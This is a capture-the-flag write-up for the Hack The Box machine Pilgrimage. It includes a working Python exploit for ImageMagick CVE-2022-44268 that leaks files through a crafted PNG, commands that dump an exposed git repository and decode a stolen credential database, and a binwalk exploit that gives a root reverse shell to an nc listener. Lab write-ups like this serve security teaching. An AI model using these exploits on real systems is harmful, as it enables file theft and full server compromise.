HTB: Pilgrimage

Easy HTB machine where a website is used to shrink images. An ImageMagick vulnerability (CVE-2022-44268) gives arbitrary file read, which is used to retrieve the application's SQLite3 database and the credentials stored in it. Root is obtained through a binwalk exploit triggered by a malware scanning script that runs on uploaded files.

nmap shows port 22 and port 80 open.

$ nmap -sC -sV -oN nmap/default_ports -v 10.10.11.219
Nmap scan report for 10.10.11.219
Host is up (0.029s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Besides this scan of the default ports, I also run a scan of all ports with -p- to make sure I don't miss anything. The results were the same.

I add the following line to my /etc/hosts file:
10.10.11.219 pilgrimage.htb

The following website shows up:
Pasted image 20230917102050

I can register for an account
Pasted image 20230917102155

I can upload a file and shrink it, after which I receive a long URL to the shrunken file.
Pasted image 20230917102420

Pasted image 20230917102431

Let's test whether I can upload a malicious PHP reverse shell or web shell.
No luck: uploading a malicious PHP web shell does not work.

I turn back and enumerate the box again, in case I missed something. And I did: after the initial enumeration I added pilgrimage.htb to my /etc/hosts file, but the first nmap scan had run against the bare IP and could not run its HTTP scripts against the domain (note the "Did not follow redirect" in http-title). So I re-ran the nmap scan on port 80, and this time it also showed http-git:

| http-git: 
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...

Great, now I can use GitDump to download all the files.

$ python3 ~/github/GitDump/git-dump.py http://pilgrimage.htb/.git/
URL for test: http://pilgrimage.htb/.git/
Fetching: http://pilgrimage.htb/.git/index
Fetching: http://pilgrimage.htb/.git/FETCH_HEAD
Fetching: http://pilgrimage.htb/.git/HEAD
Fetching: http://pilgrimage.htb/.git/ORIG_HEAD
Fetching: http://pilgrimage.htb/.git/config
Fetching: http://pilgrimage.htb/.git/description
Fetching: http://pilgrimage.htb/.git/packed-refs
Fetching: http://pilgrimage.htb/.git/info/exclude
Fetching: http://pilgrimage.htb/.git/info/refs
Fetching: http://pilgrimage.htb/.git/logs/HEAD
Script Executed Successfully
Run following command to retrieve source code: cd output && git checkout -- .

And I end up with all these files:
Pasted image 20230917105653

The application uses ImageMagick to process the uploaded files, and the magick binary shipped in the repository is version 7.1.0-49.
Pasted image 20230917105954

A quick Google search leads me to a GitHub page with an exploit for CVE-2022-44268, an arbitrary file read in ImageMagick (fixed in 7.1.0-52): when a PNG contains a tEXt chunk with the keyword profile, ImageMagick treats the chunk's value as a filename and copies the contents of that file, hex-encoded, into the processed output image.

I first generate a malicious PNG file:

$ python3 exploit.py -f "/etc/passwd" -o exploit.png
[>] ImageMagick LFI PoC - by Sybil Scan Research
[>] Generating Blank PNG
[>] Blank PNG generated
[>] Placing Payload to read /etc/passwd
[>] PoC PNG generated > exploit.png

I then upload that file via the web interface, so it gets processed by ImageMagick, and download the result again.
Pasted image 20230917111405

I then use the magick binary from the git repository (the same one that runs on the live server) to inspect the result:

$ ./magick identify -verbose result.png

From there I copy the hex under "Raw profile type" and paste it into the following snippet:

$ python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'

It dumps the whole /etc/passwd file! Great. I could of course read the user flag this way too, but I want to do it via a shell session.

Now the question is which files I want to read.
Looking through the git files again, especially register.php, I notice the following code snippet that shows where usernames and passwords are saved. Let's try to read that file via the vulnerability.
Pasted image 20230917112617

After doing the same process as before, now with /var/db/pilgrimage, I end up with a gigantic hex blob that I need to turn back into a file sqlite3 can open.

I found the following Stack Overflow question explaining how to turn the hex back into binary so I can read it with sqlite3 (xxd -r -p ignores whitespace, so the hex does not strictly have to be joined onto one line first):
xxd -r -p db_raw_oneline.hx db.bin

I now open this file with sqlite3 db.bin. Since I am unfamiliar with the syntax, I check out this quick and easy guide. And there we have a password for emily who, as you might remember, was also in the /etc/passwd dump.
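The three manual steps above (generate the PoC PNG, decode the hex from identify -verbose, turn the database hex back into a file for sqlite3) can be done in one script. The following is an added example, not the Sybil Scan Research PoC the write-up uses and not code from the Pilgrimage box. It builds a minimal PNG whose tEXt chunk uses the keyword profile (the CVE-2022-44268 trigger), parses the "Raw profile type" property out of identify -verbose output using the layout ImageMagick writes (a blank line, an optional type name, a decimal byte count, then hex rows of 36 bytes), and queries the recovered bytes as an SQLite database. The identify output and the users database used for the round trip are constructed inline; the table and column names (users, username, password) are assumed from the register.php snippet and are not verified here.

```python
#!/usr/bin/env python3
"""Added example for CVE-2022-44268 (not the PoC script the write-up used).

ImageMagick before 7.1.0-52 treats a PNG tEXt chunk with keyword "profile" as a
filename and embeds that file, hex-encoded, in the output image as a "Raw
profile type" property. Build such a PNG, then decode `identify -verbose` output.
"""
import os
import re
import sqlite3
import struct
import tempfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Length, type, data, CRC-32 over type+data (PNG chunk layout)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_poc_png(path_to_read: str) -> bytes:
    """1x1 8-bit grayscale PNG whose tEXt 'profile' chunk names the file to leak."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, depth 8, grayscale
    idat = zlib.compress(b"\x00\x00")                   # filter byte + one sample
    text = b"profile\x00" + path_to_read.encode("latin-1")
    return (PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def parse_raw_profile(identify_output: str) -> bytes:
    """Recover the leaked file from `identify -verbose` text: the value is
    "\\n<type>\\n<length>\\n" followed by hex rows of 36 bytes each."""
    lines = identify_output.splitlines()
    try:
        start = next(i for i, l in enumerate(lines) if "Raw profile type" in l)
    except StopIteration:
        raise ValueError("no 'Raw profile type' property in output") from None
    length, hexparts = None, []
    for line in lines[start + 1:]:
        tok = line.strip()
        if length is None:                 # skip blank line and profile type name
            length = int(tok) if tok.isdigit() else None
            continue
        if tok and not re.fullmatch(r"[0-9a-fA-F]+", tok):
            break                          # next property reached
        hexparts.append(tok)
        if sum(map(len, hexparts)) >= 2 * length:
            break
    if length is None:
        raise ValueError("profile length line not found")
    blob = bytes.fromhex("".join(hexparts))[:length]
    if len(blob) != length:
        raise ValueError(f"profile truncated: {len(blob)} of {length} bytes")
    return blob


def query_leaked_sqlite(blob: bytes, sql: str) -> list:
    """Stand-in for `xxd -r -p` plus `sqlite3`: write the bytes out and query them."""
    if not blob.startswith(b"SQLite format 3\x00"):
        raise ValueError("leaked bytes are not an SQLite 3 database")
    fd, path = tempfile.mkstemp(suffix=".sqlite")
    with os.fdopen(fd, "wb") as f:
        f.write(blob)
    con = sqlite3.connect(path)
    try:
        return con.execute(sql).fetchall()
    finally:
        con.close()
        os.unlink(path)


def constructed_identify_output(leaked: bytes) -> str:
    """Constructed stand-in for `magick identify -verbose result.png` (36 bytes/row)."""
    rows = "\n".join(leaked[i:i + 36].hex() for i in range(0, len(leaked), 36))
    return ("  Properties:\n    date:create: 2023-09-17T00:00:00+00:00\n"
            f"    Raw profile type: \n\n{len(leaked):8d} \n{rows}\n    signature: 00\n")


def constructed_users_db() -> bytes:
    """Constructed SQLite file standing in for /var/db/pilgrimage (schema assumed)."""
    fd, path = tempfile.mkstemp(suffix=".sqlite")
    os.close(fd)
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('emily', 'constructed-password')")
    con.commit()
    con.close()
    with open(path, "rb") as f:
        data = f.read()
    os.unlink(path)
    return data


if __name__ == "__main__":
    with open("exploit.png", "wb") as f:   # upload this, download the shrunk copy,
        f.write(build_poc_png("/etc/passwd"))   # then run `magick identify -verbose` on it
    # Offline round trip on constructed data, standing in for the real leak:
    db = constructed_users_db()
    print(query_leaked_sqlite(parse_raw_profile(constructed_identify_output(db)),
                              "SELECT username, password FROM users"))
```

Against the real box the flow is: write exploit.png with build_poc_png("/var/db/pilgrimage"), upload it, save the output of magick identify -verbose on the downloaded result to a file, and pass that text to parse_raw_profile() before handing the bytes to query_leaked_sqlite(). The byte count that ImageMagick prints in front of the hex rows is what lets the parser stop cleanly at the end of the profile instead of guessing where the next property begins.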

Pasted image 20230917114406

And I successfully login!
Pasted image 20230917114515

emily@pilgrimage:~$ cat user.txt 8a728138955c0718*************

Running ps aux shows a process, malwarescan.sh, that is not normal:
Pasted image 20230917115521

It contains the following code:
Pasted image 20230917115547

The script calls binwalk, so I check its version to see if there is anything exploitable:
Pasted image 20230917115639

Google gives me the following Exploit-DB post.

Using the exploit, I have to put the generated file in /var/www/pilgrimage.htb/shrunk, since that is the directory malwarescan.sh checks for new files.

emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ python3 ~/.a/exploit.py ~/.a/cat.jpeg 10.10.14.52 5555

After that I listen with nc and successfully get a shell as root:

$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.11.219] 43648
whoami
root
cd /root
ls
quarantine
reset.sh
root.txt
cat root.txt
2d852eac9af3249d089**********